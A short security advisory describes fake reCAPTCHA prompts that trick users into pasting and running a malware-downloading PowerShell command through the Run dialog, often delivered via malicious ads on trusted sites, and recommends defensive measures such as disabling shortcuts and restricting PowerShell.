Skip to main content
Cyber Snapshot - Fake ReCAPTCHA Attacks

Cyber Snapshot - Fake ReCAPTCHA Attacks

Several times a day, robots on websites ask humans to verify that they are not a robot by clicking on a checkbox, and the most common version of this prompt is the Google reCAPTCHA.

Because this is such a common occurrence, threat actors are now using fake CAPTCHA in their attack methodology. Websites still show the original prompt that users are used to seeing, but they are also prompted to press a series of keystrokes (usually involving WIN+R, CTRL+V, and Enter) to prove that they are human. This allows the website to execute a command on the workstation, usually a remote PowerShell script, to download malware from an external website and execute it on the workstation. 

Fake CAPTCHA prompts have been found on websites that users may trust and use regularly, such as local news websites. Some threat actors have purchased advertisement space from advertising networks used frequently by trusted websites which their targets may frequent. Generally, the advertising network will not review the advertising content shown, allowing for malicious ads to be shared through the advertising network. These malicious ads force the trusted website to redirect to a malicious website when displayed, prompting the user with the fake CAPTCHA. 

Compromised users have reported to the MC3 that they believed the trusted website was asking them to prove they were not a robot, so they thought nothing about doing what was requested. 

To avoid detection, the fake CAPTCHA is only shown to a limited number of users (usually over a pre-determined period of time, or a certain number of times per day for a given geographic region). This means that the website owner is usually not aware of an issue stemming from their website. Even if the website owner wants to investigate a complaint from a visitor, they are generally unable to replicate the issue. The MC3 has reached out to several website owners and found that many are reluctant to remove advertising network content from their website due to potential loss of revenue.

Recommendations

  • The WIN+R (Run), WIN+S (Search), and WIN+X (Power User Task Menu) shortcuts are often only used by power users within your organization. Use registry settings or group policy to disable these shortcut keys on your normal user workstations.
  • Malware utilizing PowerShell will generally attempt to mask its functionality using two built-in alias functions: iex (Invoke Expression) and ii (Invoke Item). Removing these aliases at the user profile level for workstations which do not commonly run PowerShell commands may interrupt some malware from functioning properly.
  • Setting the PowerShell execution policy to “Restricted” or “AllSigned” through group policy, will limit unknown script execution and prevent the user from accidentally running an unsigned script.
  • Most malicious domains are registered for less than a month before they are used for a malicious purpose. If your web filtering or anti-malware software permits blocking outbound access to websites based on the age of the domain, this can be an effective method to prevent your users from reaching potentially malicious content.

 

April 1, 2025
CS-02-2025

 

A fake CAPTCHA with verification steps asking the user to press WIN-R, CTRL-V, and ENTER.